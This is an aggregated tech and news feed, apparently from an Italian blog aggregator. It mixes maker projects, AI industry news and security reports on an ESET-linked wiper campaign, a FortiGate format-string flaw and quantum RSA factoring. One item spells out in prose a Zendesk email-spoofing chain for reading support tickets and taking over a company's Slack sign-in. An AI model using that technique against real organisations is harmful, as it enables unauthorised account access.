


Istat: corruption is falling but not yet eradicated | La Città Futura

"Secondo l’ultimo rapporto Istat, sono calate nel periodo 2022-2023 le richieste corruttive di denaro o altro alle famiglie per avere in cambio beni, agevolazioni o servizi. Ma non possiamo gioire, perché il fenomeno corruttivo non è affatto sconfitto."

lacittafutura.it/interni/istat…



Jensen Huang: AGI is coming! Discovering Nvidia's new frontiers


Jensen Huang, CEO of Nvidia, was recently a guest on the Bg2 Pod talk show, where he discussed various topics related to artificial intelligence (AI), with a particular focus on the evolution towards artificial general intelligence (AGI). During the conversation with hosts Brad Gerstner and Clark Tang, Huang highlighted the rapid evolution of AI technology and the potential of AGI assistants, which are expected to become increasingly sophisticated over time.

Huang emphasised Nvidia's leadership in computing, pointing to the competitive advantages gained by reducing processing costs and innovating in hardware architecture. He described Nvidia's "moat" as a long-term software and hardware ecosystem, which makes it hard for competitors to overtake the company with isolated improvements in chips alone.

youtube.com/embed/bUrCR4jQQg8?…

Huang also praised Elon Musk's xAI for the rapid completion of the Memphis super cluster, which uses 100,000 GPUs. He called this achievement "unprecedented" and acknowledged the crucial role the cluster will play in AI inference and training, positioning it as one of the fastest supercomputers in the world.

On AI's impact on productivity, Huang was optimistic, stating that AI will improve business efficiency and will not lead to mass unemployment. He stressed the need to ensure safety in the development and use of the technology, so that its benefits serve society as a whole.

Huang then went deeper into the concept of AGI, describing a personal assistant that learns and improves over time, making the technology useful from the outset even if it is not perfect. He said the rate of change in AI is accelerating at an unprecedented pace, leading to innovations that outstrip the traditional Moore's Law.

He also discussed the nature of machine learning, arguing that it is not just a matter of better chips but of optimising the entire data-processing pipeline. According to Huang, success in AI requires treating every step of the machine-learning process as part of a flywheel that has to be accelerated.

Finally, Huang reflected on Nvidia's competitive advantage, stressing that the company has built a complete ecosystem combining hardware, software and applications. He said that, unlike other companies, Nvidia developed a domain-specific library that revolutionised deep learning, highlighting the importance of effective communication between the science and the underlying architecture.

The article Jensen Huang: AGI is coming! Discovering Nvidia's new frontiers comes from il blog della sicurezza informatica.




Little RC Car Project Takes Inspiration From Mario Kart



RC cars used to be pretty simple. They’d go forwards, backwards, and steer if you got a full-function toy. However, with modern technology, it’s pretty trivial to make them more advanced. [Stuck at Prototype] demonstrates that nicely with his little Micro Racer Cars.

Each little RC car has its own ESP32 running the show, hooked up to a motor controller driving a small DC gear motor at each wheel. Power comes from a lithium-polymer battery on board the car, charged via USB-C. 3D-printed components form the chassis and body of the vehicle. [Stuck at Prototype] set the cars up so they could be controlled via a smartphone app, or via a custom RC controller of his own design. He preferred the latter solution after he realized how hard apps were to maintain. He also gave the cars a little color sensor so they could detect color patches on the ground and change their behavior accordingly. This was to create gameplay like Mario Kart, where hitting a color patch might make the car go fast, go slow, or spin out.

The video goes into great detail about everything these tiny tabletop racers can do. The racer cars were initially intended to be a Kickstarter-funded project, but it never quite reached its goal. Instead, [Stuck at Prototype] decided to release the designs online, putting the relevant files on GitHub.

We’ve seen some other neat RC projects before, too. Video after the break.

youtube.com/embed/6jzG-BMannc?…

[Thanks to Hari Wiguna for the tip!]


hackaday.com/2024/10/18/little…



Europol hosts the European Cybercrime Conference


This week, Europol hosted the global law-enforcement community and the #cybersicurezza industry at its headquarters, coinciding with the international cybersecurity awareness month.

The week centred on the European Cybercrime Conference and marked the 10th anniversary of the Joint Cybercrime Action Taskforce (J-CAT).
The European Cybercrime Conference, held from 16 to 17 October, provided a platform to discuss the latest cybercrime trends and challenges. More than 460 representatives from 82 countries took part, including law-enforcement officials, cybersecurity experts and industry representatives, all focused on strengthening Europe's security and resilience in the face of growing cyber threats.

This year's conference was built around five key thematic elements:
- Impact operations: showcasing recent international law-enforcement operations, this block highlighted the detection, investigation and disruption methods used to tackle cybercrime.
- Data access for rapid disruption: this block explored opportunities for data access and examined the legal, policy and technical obstacles that affect the detection, investigation and disruption of cyber threats.
- Future challenges against cybercrime: focused on anticipating the upcoming challenges in the cybercrime landscape, this block stressed the need to keep advancing the understanding of threats and possible solutions.
- 10 years of #J-CAT operational achievement: on the occasion of J-CAT's 10th anniversary, this block reflected on the creation of the task force, its first key cases, its current priorities and its future direction.
- Harnessing technology for successful investigations: the final block examined how emerging technologies, such as artificial intelligence, can be leveraged in the fight against #criminalitàinformatica.

#europol
@Notizie dall'Italia e dal mondo



Smart Glasses Read Text



You normally think of smart glasses as something you wear either as an accessory or, if you need a little assistance, with corrective lenses. But [akhilnagori] has a different kind of smart eyewear. These glasses scan text and read it aloud into the user’s ear.

This project was inspired by a blind child who enjoyed listening to stories but could not read beyond a few braille books. The glasses perform the reading using a Raspberry Pi Zero 2 W and a machine learning algorithm.

The original software development took place on a Windows machine using WSL, to simplify porting to the Linux-based Raspberry Pi board.

The frame is 3D printed, of course. Mounting the CPU, a camera, and a battery, along with a DC to DC converter, is fairly trivial. The real heavy lifting is in the software. The glasses snap a picture every ten seconds. It might be interesting to add a button or other means to let the user trigger a scan.

Of course, you could build something similar to run on just about any device with a camera and Python. It would be easy, for example, to put something in a hand-held format.

OCR is a readily solved problem. There are commercial smart glasses that look nice, and we wonder if any will have similar apps for them.


hackaday.com/2024/10/18/smart-…



CNC Metal Forming


A large silver cone attached to a black hemisphere floats over a piece of sheet metal held in a metal frame. The metal has what appears to be machine grease on it to aid in the forming process.

Forming complex shapes in metal sheets is still a laborious process, especially if you aren’t needing more than a couple parts so stamping doesn’t make sense. That may change with Digital Sheet Forming.

While this video is basically an ad for one vendor’s approach, it gives a good set of examples of what the technique can achieve. The high pressure mechanism of the machine presses the metal layer by layer down against a silicone backing to form what you’ve designed, in this case, the nose cone for a Tucker Carioca.

Some people will decry it killing the metal forming industry, but as [Rob Ida] says in the video, it will allow metal formers to become more efficient at the work they do by taking out the tedium and letting them focus on the parts of the process requiring the most skill. Anyone who’s done any work with a 3D printer or CNC mill will know that sending a file to a machine is only one small part of the process.

We’re anxious to see this technology make its way to the makerspace and home shop. If you want to do some sheet metal forming now, why not try hydroforming?

youtube.com/embed/ou5wPy56B3I?…


hackaday.com/2024/10/18/cnc-me…



Occupy and cultivate: the new guardians of Israeli colonisation | L'Indipendente

"In Israel, agriculture is a vehicle of colonisation. Through it the settlers expand their settlements, after forcibly driving out the Palestinians and destroying their crops and olive groves. Various organisations do the dirty work on behalf of the State of Israel, occupying land in the West Bank. Some of them count tens of thousands of volunteers working in the agricultural sector."

lindipendente.online/2024/10/1…







FM Transmitter Remotely Controlled Via ESP32



Imagine you’ve got an FM transmitter located some place. Wouldn’t it be mighty convenient if you could control that transmitter remotely? That way, you wouldn’t have to physically attend to it every time you had to change some minor parameters! To that end, [Ricardo Lima Caratti] built a rig to do just that.

The build is based around the QN8066—a digital FM transceiver built into a single chip. It’s capable of transmitting and receiving anywhere from 60 MHz to 108 MHz, covering pretty much all global FM stereo radio bands. [Ricardo] paired this chip with an ESP32 for command and control. The ESP32 hosts an HTTP server, allowing the administration of the FM transmitter via a web browser. Parameters like the frequency, audio transmission mode, and Radio Data Service (RDS) information can be controlled in this manner.

It’s a pretty neat little build, and [Ricardo] demonstrates it on video with the radio transmitting some field day content. We’ve seen some other nifty FM transmitters over the years, too. Video after the break.

youtube.com/embed/IFOy-DizVIk?…


hackaday.com/2024/10/18/fm-tra…


in reply to Cybersecurity & cyberwarfare

@rimugu Somewhat related: Chris and the crew over at Linux Unplugged do a deep dive on the Meshtastic project: jupiterbroadcasting.com/show/l…
in reply to kurt

@kurt @rimugu looking forward to checking this out as I'd like to learn more about Meshtastic.


Teardowns Show Off Serious Satellite Hardware



As hackers, we’re always pulling stuff apart—sometimes just to see what it’s like inside. Most of us have seen the inside of a computer, television, and phone. These are all common items that we come into contact with every day. Fewer of us have dived inside real spacey satellite hardware, if only for the lack of opportunity. Some good gear has landed on [Don]’s desk over the years though, so he got to pulling it apart and peering inside.

[Don] starts us off with a gorgeous… box… of some sort from Hughes Aircraft. He believes it to be from their Space & Communications group, and it seems to have something to do with satellite communications work. Externally, he gleans that it takes power and data hookups and outputs RF to, something… but he’s not entirely sure. Inside, we get a look at the old 90s electronics — lots of through hole, lots of big chunky components, and plenty of gold plating. [Don] breaks down the circuitry into various chunks and tries to make sense of it, determining that it’s got some high frequency RF generators in the 20 to 40 GHz range.

Scroll through the rest of [Don]’s thread and you’ll find more gems. He pulls apart a microwave transmitter from Space Micro — a much newer unit built somewhere around 2008-2011. Then he dives into a mysterious I/O board from Broad Reach, and a very old Hughes travelling wave tube from the 1970s. The latter even has a loose link to the Ford Motor Company, believe it or not.

Even if you don’t know precisely what you’re looking at, it’s still supremely interesting stuff—and all very satellite-y. We’ve seen some other neat satellite gear pulled apart before, too. Meanwhile, if you’ve been doing your own neat teardowns, don’t hesitate to let us know!


hackaday.com/2024/10/18/teardo…



Often the ignorant person swats information away like an annoying mosquito and looks for "information" that provides reassurance. They also love to get viscerally angry at fake news that deliberately presents the designated villain of the day and lets them pillory him in an amusing way, and so vent. In all of this, attention to seeking correct and useful information is marginal. There is no search for the telltale signs of fake news, no search for the emotional reaction it aims at, no search for the value of the source. If such a person has a specific fantasy, the subculture that grows up around it is welcome, as long as it confirms it. A subculture is a set of relative beliefs and values around which social aggregation forms and spreads. One example is the gangs inside US cities. But a religion, a belief, a "value" can also feed and become a subculture. A subculture is not "toxic" only if there is awareness that it represents just one part of something broader and of greater value.


This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss a tech near-catastrophe, data journalism, and breach rumors. #BehindTheBlog


A Hacker’s Travel Guide To Europe



This summer, I was pleasantly surprised when a friend of mine from Chicago turned up at one of the hacker camps I attended. A few days of hanging out in the sun ensued, doing cool hacker camp stuff, drinking unusual beverages, and generally having fun. It strikes me as a shame that this is such a rare occurrence, and since Hackaday is an American organisation and I am in a sense writing from its European outpost, I should do what I can to encourage my other friends from the USA and other parts of the world to visit. So here I’m trying to write a hacker’s guide to visiting Europe, in the hope that I’ll see more of you at future camps and other events.

It’s Intimidating. But Don’t Worry.

Danish road sign: "Se efter tog", or according to Google Translate: "Look for trains". Yes. We’d find this intimidating, too. (Bewitchedroutine, Public domain.)
First of all, I know that it’s intimidating to travel to an unfamiliar place where the language and customs may be different. I’m from England, which sits on a small island in the North Atlantic, and believe it or not it’s intimidating for us to start traveling too. It involves leaving the safety of home and crossing the sea whether by flight, ferry, or tunnel, and that lies outside one’s regular comfort zone.

Americans live in a country that’s almost a continent in its own right, so you can satisfy your travel lust without leaving home. Thus of course the idea of landing in Germany or the Netherlands is intimidating. But transatlantic flights are surprisingly cheap in the scheme of international travel because of intense competition, so I’m here to reassure you that you can travel my continent’s hacker community without either feeling out of your depth or breaking the bank.

What About The Language Barrier?


Let’s start with the language. I’m a British English speaker, je parle Francais, een beetje Nederlands, and ein bischien Deutsch. (Ed note: errors left intact for authenticity.) The fact is though, while it’s nice to try my halting Dutch to buy a portion of haring en uitjes, the truth is I rarely find myself completely lost in my travels through the hacker community on just my native language. It may annoy the French to call English a lingua franca, but if you’re an Anglophone you’ve lucked out in having the international glue language at your fingertips. It’s the default translation when traveling, and in major cities you will usually find people who speak it when you need to. Meanwhile we’re lucky enough that there are few cities which don’t have some form of hackerspace, so you can usually find someone friendly with local knowledge if you need a bit of advice.

So It’s Not As Scary As You Think, But Why Come Here?

The SHA2017 sign against a blue sky with fluffy clouds. Different countries take it in turns to host the year’s largest hacker camp. This is SHA2017, in the Netherlands.
From here in Europe we look over the Atlantic at events like Def Con with some envy, but the fact is that Americans do things a little differently from us. Those events are expensive, while for us a summer hacker event is a community led affair in a field with camping thrown in. Some of the tickets are a few hundred dollars, but that’s it, no hotels, just camping in a field with five thousand other hackers.

Even better, the smaller events are cheaper, and often have much more charm as they aren’t so overwhelming. I can afford to do more than one, because they don’t cost an outrageous amount, and if I work out my timing I can even travel from one to the next without needing anywhere to stay over, instead helping with set-up and teardown. Add to that those hundreds of hackerspaces in cities only a relatively short distance apart, and there’s a lot to see.

Getting Around Needn’t Bankrupt You

Screenshot of the eurail app, Paris to Copenhagen. Getting around with eurail is as simple as selecting your journey and boarding the train.
One of the great holidays of the world remains the Great North American Road Trip. Grab a car with a couple of friends, and head out across the wide open spaces on the roads less traveled. Eat at Mom-n-Pop roadside diners in flyspeck towns, and enjoy what the continent has to offer under that endless sky. But while hire cars and gasoline may be cheap in the USA, long distance driving is tedious, so Americans prefer to fly.

Europe is different: hire cars are expensive, gasoline is eye-wateringly expensive, and while budget flights can be cheap, they really are a royal pain in the ass. Fortunately our continent is still criss-crossed by an extensive passenger rail network, and while individual tickets can be expensive there’s a very handy hack that makes them a great choice for a tourist. It’s called the eurail pass, originally designed for young people but now available for all ages, and it offers visitors universal access to the whole continent’s rail network.

Taking a train from Paris to Copenhagen is simply a case of punching the journey into the app, and doing it with 180 mph high-speed trains instead of slower regional trains usually only takes a few Euros extra booking fee. If you’ve ever wondered how I write about events all over Europe for Hackaday I can reveal that there’s no diamond-encrusted expense account, instead I use the domestic European version of this pass. It’s that good.

Where To Stay

A hacker campsite against a dramatic cloudy sky. BornHack is one of the smaller European hacker camps, offering a week in a Danish forest.
If you are coming over for a hacker camp, there’s your campsite and event all rolled into one, but outside the camps there are still some affordable options. Starting with camping, for us it’s not the backwoods facilities of a trailhead camping spot but in most cases a commercial camp site. For not a huge amount of money you’ll get toilets and showers along with your pitch, and even a 230V CEE-form power hook-up if you’re prepared to pay extra.

I’ve written Hackaday articles in more than one camp site in my time. Then if you have a eurail pass it’s worth noting that Europe has a night train network. If it’s a conventional sit-up train you might not have the most comfortable night, but for the extra cost of a sleeper berth you can swallow up the journey in comfort and have the day to do more interesting stuff. Then, as everywhere, it’s easy to find a hotel; I tend to aim for non-tourist-destination train stops and find a two-star room for about 50 to 70 Euros when I need one. And after a few nights camping and night training, you will need one. Finally, as you wander around our continent’s hackerspaces you may find the occasional offer of a sofa for the night, but remember that most European houses are tiny and the etiquette around staying over may be a little different. Only expect to stay for a while and use someone’s place as a base if they really know you.

Day To Day

Dutch haring met uitjes en zuur, salted raw herring with chopped onions and pickles. Trust me, it's rather good. Try the local fast food, you won’t regret it. (C van der, CC BY 2.0.)
It’s possible to exist in many European cities using small-denomination cash in whatever the local currency is, and shopping in ancient markets for exotic ingredients. It’s fun, even. But Europeans shop at the same shops and supermarkets as anyone else, and your Mastercard will work here too.

Look out for budget supermarkets, Aldi, Lidl, or Netto if you’re on a shoestring, and Primark if you’re in need of clothing. Meanwhile eating out can be expensive, and we don’t have a tradition of eating out for breakfast. We have McDonalds, Burger King, and KFC here just like anywhere else, but seek out the local fast food, it’s worth it.

European Hackerspaces


Wrapping it up, if you’re an American you may not be used to most hackerspaces only being a few tens of miles from each other. As a member of several European spaces it’s great to have international visitors drop by, so please, check out online when you go somewhere, find the space, and give them a shout. I have drunk Club-Mate and eaten a variety of delicacies while sitting on shabby sofas in the company of my peers continent-wide, and if you’re One of Us and looking to get to know a country there’s no better way.

So. The Hackaday Tourist Guide has spoken: are we going to see you at a European event next summer?

Header: NASA, public domain.


hackaday.com/2024/10/18/a-hack…



This Is Exactly How an Elon Musk-Funded PAC Is Microtargeting Muslims and Jews With Opposing Messages #election #DataJournalism


NATO consolidates its support for Ukraine and defines its priorities

@Notizie dall'Italia e dal mondo

The two-day meeting between the defence leaders of the Atlantic Alliance, which has just concluded, was not only one of the first opportunities for Mark Rutte, NATO's new secretary general who took over at the start of the month, to address the Allies, but also an important moment to reaffirm support



Hackaday Podcast Episode 293: The Power of POKE, Folding Butterflies, and the CRT Effect



This week on the Podcast, Hackaday’s Elliot Williams and Kristina Panos joined forces to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.

First up in the news: we’ve extended the 2024 Supercon Add-On contest by a week! That’s right, whether you were held up by Chinese fall holidays or not, here’s your chance to get in on this action.

A square image with the Supercon 8 Add-On Contest art featuring six SAOs hanging from lanyards. We love to see the add-ons people make for the badge every year, so this time around we’re really embracing the standard. The best SAOs will get a production run and they’ll be in the swag bag at Hackaday Europe 2025.

What’s That Sound pretty much totally stumped Kristina once again, although she kind of earned a half shirt. Can you get it? Can you figure it out? Can you guess what’s making that sound? If you can, and your number comes up, you get a special Hackaday Podcast t-shirt.

Then it’s on to the hacks, beginning with what actually causes warping in 3D prints, and a really cool display we’d never heard of. Then we’ll discuss the power of POKE when it comes to live coding music on the Commodore 64, and the allure of CRTs when it comes to vintage gaming. Finally, we talk Hackaday comments and take a look at a couple of keyboards.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

Download in DRM-free MP3 and savor at your leisure.


hackaday.com/2024/10/18/hackad…



Double-Slit Time Diffraction At Optical Frequencies



The double-slit experiment, first performed by [Thomas Young] in 1801, provided the first definitive proof of the dual wave-particle nature of photons. A similar experiment can be performed that shows diffraction at optical frequencies by changing the reflectivity of a film of indium tin oxide (ITO), as demonstrated in an April 2024 paper (preprint) by [Romain Tirole] et al. published in Nature Physics. The reflectivity of a 40 nm thick film of ITO deposited on a glass surface is altered with 225 femtosecond pulses from a 230.2 THz (1300 nm) laser, creating temporal ‘slits’.
Interferogram of the time diffracted light as a function of slit separation (ps) and frequency (THz). (Credit: Tirole et al., Nature Physics, 2024)
The diffraction in this case occurs in the temporal domain, creating new frequencies in the spectrum when a separate laser applies a brief probing pulse. The effect can be seen most clearly in an interferogram (see excerpt at the right). Perhaps the most interesting finding of the experiment was how quickly and easily the ITO layer’s reflectivity could be altered. ITO is a very commonly used compound material that provides properties such as electrical conductivity and optical transparency, which make it incredibly useful for windows, displays and touch panels.

Although practical applications for temporal diffraction in the optical or other domains aren’t immediately obvious, much like [Young]’s original experiment the implications are likely to be felt (much) later.

Featured image: the conventional and temporal double-slit experiments, with experimental setup (G). (Credit: Tirole et al., Nature Physics, 2024)


hackaday.com/2024/10/18/double…



Raccoon, the Friendica app that also has surprises for Mastodon users (automatic translation from Italian)


Raccoon for Friendica (there is actually also a Raccoon for Lemmy app) is an amazing app and, although it is still in “beta” (the installation file can be downloaded here), it seems like a completely mature app, full of innovations and, surprisingly, it even manages to offer something completely new to Mastodon users! NB: This is an automatic translation from Italian.


Oh yes! #RaccoonForFriendica is the most complete app ever seen for Friendica and, in addition to working with Mastodon, it might be the only app in the world capable of managing the potential of Mastodon Glitch-soc

informapirata.it/2024/10/18/ra…

#Friendica #Glitch #Poliversity #Poliverso #Raccoon #RaccoonForFriendica






Giorgia's American Network: how the US is getting its hands on Italian data centres


@Politica interna, europea e internazionale
«No to big international finance!», shouted Giorgia Meloni in her famous Marbella speech, on the stage of the Francoist party Vox. It was 14 June 2022 and the leader of Fratelli d’Italia could still afford the aggressive tones of the «underdog»



Cyber-attack on ESET: reality or false accusation? The Handala group may be behind it


ESET has denied allegations that its systems were compromised, after security specialist Kevin Beaumont revealed a malicious campaign that appeared to be run using ESET infrastructure.

According to Beaumont's blog, an employee of the Israeli company fell victim to the malware after opening a link in an e-mail purportedly sent by the ESET Advanced Threat Defense team in Israel. The e-mail successfully passed the DKIM and SPF checks for the ESET domain, but Google Workspace flagged it as dangerous.

The attack was recorded on 8 October and targeted cybersecurity specialists in Israel. The malicious file was distributed through ESET's servers, and recipients were warned that the attack had been carried out by a "state-backed" attacker. Victims were also encouraged to take part in the ESET Unleashed programme, which does not actually exist as a separate initiative, although the name appears in the company's branding.

The researcher found several ESET DLLs and a malicious setup.exe file in the downloaded archive. Beaumont described the program as fake ransomware that mimics the behaviour of the well-known Yanluowang malware. Beaumont also noted that the files on affected devices cannot be recovered, because the program is actually a wiper.

During execution, the malware also contacted an organisation linked to Iron Swords War Day, dedicated to the memory of the victims of the 7 October 2023 attack. The facts suggest the possible involvement of hacktivists.

ESET denied Beaumont's account of a breach of the company's Israeli office. The company stressed that the incident affected a partner organisation in Israel and that the malicious campaign was blocked within 10 minutes. ESET assured that it had successfully blocked the threat and that customers are safe. The company also confirmed that it is working with its partner on the investigation and continues to monitor the situation.

The source of the malicious activity has not yet been identified, but the methods used in the attack resemble the tactics of the pro-Palestinian group Handala. Trellix researchers previously reported that Handala is actively using droppers to attack Israeli organisations, detecting hundreds of incidents over several weeks in July.

The article Cyber-attack on ESET: reality or false accusation? The Handala group may be behind it comes from il blog della sicurezza informatica.


Okay, ESET Israel definitely got compromised, this thing is fake ransomware that talks to an Israeli news org server for whatever reason.


Raccoon, the Friendica app that holds surprises for Mastodon users too


Raccoon for Friendica (there is actually also a Raccoon for Lemmy app) is a surprising app and, although still in "beta" (the installation file can be downloaded here), it looks like a fully mature app, rich in innovations and, surprisingly, it even manages to offer something completely new to Mastodon users! We therefore decided to write this…


Raccoon, the Friendica app that holds surprises for Mastodon users too

#RaccoonForFriendica is the most complete app seen so far for Friendica and, besides also working with Mastodon, it may be the only app in the world able to handle the capabilities of Mastodon Glitch-soc

informapirata.it/2024/10/18/ra…

#Friendica #Mastodon #Poliversity #Poliverso #Raccoon #RaccoonForFriendica




Will Italy have its own cyber armed force? Lawyer Mele answers

@Notizie dall'Italia e dal mondo

Recent reports, coming to us above all from Ukraine and the Middle East, have made it possible to better outline the real and concrete role that cyberspace plays in modern conflicts. In this sense, it appears evident how there clearly emerges from the shadow of approximations and hashtags on social



This Week in Security: Quantum RSA Break, Out of Scope, and Spoofing Packets



Depending on who you ask, the big news this week is that quantum computing researchers out of China have broken RSA. And that’s true… sort of. There are multiple caveats, like the fact that this proof of concept is only factoring a 22-bit key. The minimum RSA size in use these days is 1024 bits. The other important note is that this wasn’t done on a general purpose quantum computer, but on a D-Wave quantum annealing machine.

First off, what is the difference between a general purpose and an annealing quantum computer? Practically speaking, a quantum annealer can’t run Shor’s algorithm, the quantum algorithm that can factor large numbers into their primes in much shorter time than classical computers. While it’s pretty certain that this algorithm works from a mathematical perspective, it’s not at all clear that it will ever be possible to build effective quantum computers that can actually run it for the large numbers that are used in cryptography.

We’re going to vastly oversimplify the problem, and say that the challenge with general purpose quantum computing is that each q-bit is error prone, and the more q-bits a system has, the more errors it has. This error rate has proved to be a hard problem. The D-wave quantum annealing machine side-steps the issue by building a different sort of q-bits, that interact differently than in a general purpose quantum computer. The errors become much less of a problem, but you get a much less powerful primitive. And this is why annealing machines can’t run Shor’s algorithm.

The news this week is that researchers actually demonstrated a different technique on a D-wave machine that did actually factor an RSA key. From a research and engineering perspective, it is excellent work. But it doesn’t necessarily demonstrate the exponential speedup that would be required to break real-world RSA keys. To put it into perspective, you can literally crack a 22 bit RSA key by hand.
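To make "crack a 22-bit RSA key by hand" concrete, here is an added example (not code from the Hackaday column or from the annealing paper it discusses). It builds a textbook RSA key from two constructed 11-bit primes, 1553 and 2011, whose product is a 22-bit modulus, then recovers the private exponent from the public key alone by plain trial division and uses it to decrypt. The primes, exponent and message are assumptions for the demo; the loop bound comment is the only part that refers to 1024-bit keys.

```python
"""Factor a 22-bit RSA modulus by trial division and recover the private key.

Added example, not code from the article or the paper it discusses. The
primes 1553 and 2011 are constructed for this demo; their product is a
22-bit modulus, the same key size as the proof of concept.
"""
from math import gcd, isqrt


def make_toy_rsa_key(p: int, q: int, e: int = 65537):
    """Build a textbook RSA key (n, e, d) from two primes. No padding: demo only."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)  # modular inverse, Python 3.8+
    return n, e, d


def factor_by_trial_division(n: int):
    """Return (p, q) with p <= q by trying every odd candidate up to sqrt(n).

    For a 22-bit n that is at most about 1024 divisions, which is why
    'crack it by hand' is a fair description. The same loop on a 1024-bit
    n would need on the order of 2**512 steps, which is the whole point of
    RSA: the public key gives away n but not its factors.
    """
    if n % 2 == 0:
        return 2, n // 2
    for candidate in range(3, isqrt(n) + 1, 2):
        if n % candidate == 0:
            return candidate, n // candidate
    raise ValueError("n has no nontrivial factor")


def recover_private_exponent(n: int, e: int) -> int:
    """Given only the public key (n, e), factor n and derive d."""
    p, q = factor_by_trial_division(n)
    return pow(e, -1, (p - 1) * (q - 1))


def rsa_encrypt(m: int, n: int, e: int) -> int:
    return pow(m, e, n)


def rsa_decrypt(c: int, n: int, d: int) -> int:
    return pow(c, d, n)


if __name__ == "__main__":
    n, e, d = make_toy_rsa_key(1553, 2011)
    print(f"n = {n} ({n.bit_length()} bits)")
    ciphertext = rsa_encrypt(42, n, e)
    d_recovered = recover_private_exponent(n, e)
    print("recovered d equals real d:", d_recovered == d)
    print("decrypted with recovered key:", rsa_decrypt(ciphertext, n, d_recovered))
```

Running it prints the modulus 3123083 (22 bits), confirms that the exponent recovered from the public key alone equals the real one, and decrypts the test message. The factoring step is the only "attack"; everything else is textbook RSA arithmetic that any key size shares.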

Zendesk Out of Scope


Here’s an example of two things. First off, a bug being out of scope for a bounty shouldn’t stop a researcher from working on a bug. Second, it’s worth being extra careful in how a bug bounty’s scope is set up, as sometimes bugs have unforeseen consequences. We’re talking here about Zendesk, a customer support tool and ticket manager. [Daniel] found an issue where an attacker could send an email to the support email address from a spoofed sender, and add an arbitrary email address to the ticket, gaining access to the entire ticket history.

Because the problem was related to email spoofing, and the Zendesk bounty program on HackerOne considers “SPF, DKIM, and DMARC” to be out of scope, the ticket was closed as “informative” and no bounty awarded. But [Daniel] wasn’t done. What interesting side effects could he find? How about triggering single sign-on verification to go to the support email address? Since an Apple account can be used to sign on to Slack, an attacker can create an Apple account using the support email address, use the email spoof to get access to the ticket that is created, and therefore the one-time code. Verify the account, and suddenly you have an Apple account at the target’s domain. [Daniel] used this to gain access to company Slack channels, but I’d guess this could be used for even more mayhem at some businesses.

Given that the original bug report was closed as “informational”, [Daniel] started reporting the bug to other companies that use Zendesk. And it paid off, netting more than $50,000 for the trouble. Zendesk never did pay a bounty on the find, but did ask [Daniel] to stop telling people about it.

Fortinet Fixed It


The good folks at Watchtowr Labs have the inside scoop on a recently fixed vulnerability in Fortinet’s FortiGate VPN appliance. It’s a good fix found internally by Fortinet, and gives us a good opportunity to talk about a class of vulnerability we haven’t ever covered. Namely, a format string vulnerability.

The printf() function and its siblings are wonderful things. You give it a string, and it prints it to standard output. You give it a string that contains a format specifier, like %s, and it will replace the specifier with the contents of a variable passed in as an additional argument. I write a lot of “printf debugging” code when trying to figure out a problem, that looks like printf("Processing %d bytes!\n", length);

What happens if the specifier doesn’t match the data type? Or if there is a specifier and no argument? You probably know the answer: Undefined behavior. Not great for device security. And in this case, it does lead to Remote Code Execution (RCE). The good news is that Fortinet found this internally, and the fix was quietly made available in February. The bad news is that attackers found it, and have since been actively using it in attacks.
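The two bad shapes described above, a non-literal format string and a specifier with no matching argument, are exactly what a compiler's -Wformat and -Wformat-security warnings look for. As an added example (not Fortinet's or watchTowr's code), here is a deliberately simplified checker in Python that scans C source lines for printf-family calls and reports both cases; the C snippets inside it are constructed inputs, and the set of functions and the argument indexes are assumptions for the demo.

```python
"""Flag printf-family calls whose format string is not a literal, or whose
literal has more conversion specifiers than supplied arguments.

Added example, not code from the article or from Fortinet. It approximates
what -Wformat / -Wformat-security do; the C lines in SAMPLE_C are constructed.
"""
import re

# 0-based index of the format argument for each function (assumed set)
FORMAT_ARG_INDEX = {"printf": 0, "fprintf": 1, "sprintf": 1, "snprintf": 2, "syslog": 1}

CALL_RE = re.compile(r"\b(" + "|".join(FORMAT_ARG_INDEX) + r")\s*\(")
# one conversion: %[flags][width][.precision][length]conversion
SPEC_RE = re.compile(
    r"%[-+ #0]*(?:\*|\d+)?(?:\.(?:\*|\d+))?(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfFgGaAcspn]"
)

SAMPLE_C = r'''printf("Processing %d bytes!\n", length);           /* fine */
printf(user_supplied);                               /* format is attacker-controlled data */
printf("user %s sent %d bytes\n", name);             /* %d has no argument */
snprintf(buf, sizeof(buf), "%s", user_supplied);     /* fine: data passed as an argument */
fprintf(stderr, "%5.2f%%\n", ratio);                 /* fine: %% is a literal percent sign */
syslog(LOG_WARNING, msg);                            /* format is a variable */'''


def split_top_level_args(text):
    """Split a call's argument list on top-level commas, stopping at its ')'."""
    args, depth, cur, in_str, i = [], 0, "", False, 0
    while i < len(text):
        ch = text[i]
        if in_str:
            cur += ch
            if ch == "\\" and i + 1 < len(text):  # keep escaped char with its backslash
                cur += text[i + 1]
                i += 1
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str, cur = True, cur + ch
        elif ch in "([":
            depth, cur = depth + 1, cur + ch
        elif ch in ")]":
            if depth == 0:
                args.append(cur.strip())
                return args
            depth, cur = depth - 1, cur + ch
        elif ch == "," and depth == 0:
            args.append(cur.strip())
            cur = ""
        else:
            cur += ch
        i += 1
    args.append(cur.strip())
    return args


def check_format_calls(source):
    """Return [(line_no, function, problem)] for risky printf-family calls."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for m in CALL_RE.finditer(line):
            func = m.group(1)
            args = split_top_level_args(line[m.end():])
            idx = FORMAT_ARG_INDEX[func]
            if len(args) <= idx:
                continue
            fmt = args[idx]
            if not (len(fmt) >= 2 and fmt[0] == '"' and fmt[-1] == '"'):
                findings.append((line_no, func, "format string is not a literal"))
                continue
            # each '*' width/precision consumes an extra argument; '%%' is not a conversion
            wanted = sum(1 + spec.count("*") for spec in SPEC_RE.findall(fmt.replace("%%", "")))
            supplied = len(args) - idx - 1
            if wanted > supplied:
                findings.append((line_no, func, "more conversion specifiers than arguments"))
    return findings


if __name__ == "__main__":
    for line_no, func, problem in check_format_calls(SAMPLE_C):
        print(f"line {line_no}: {func}: {problem}")
```

On the constructed sample it reports lines 2, 3 and 6. The real compiler warnings handle many more cases (macros, wrapped functions annotated with __attribute__((format)), type mismatches between specifier and argument); the point of the toy is that both dangerous shapes are detectable statically, before the code ships on an appliance.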

Escape!


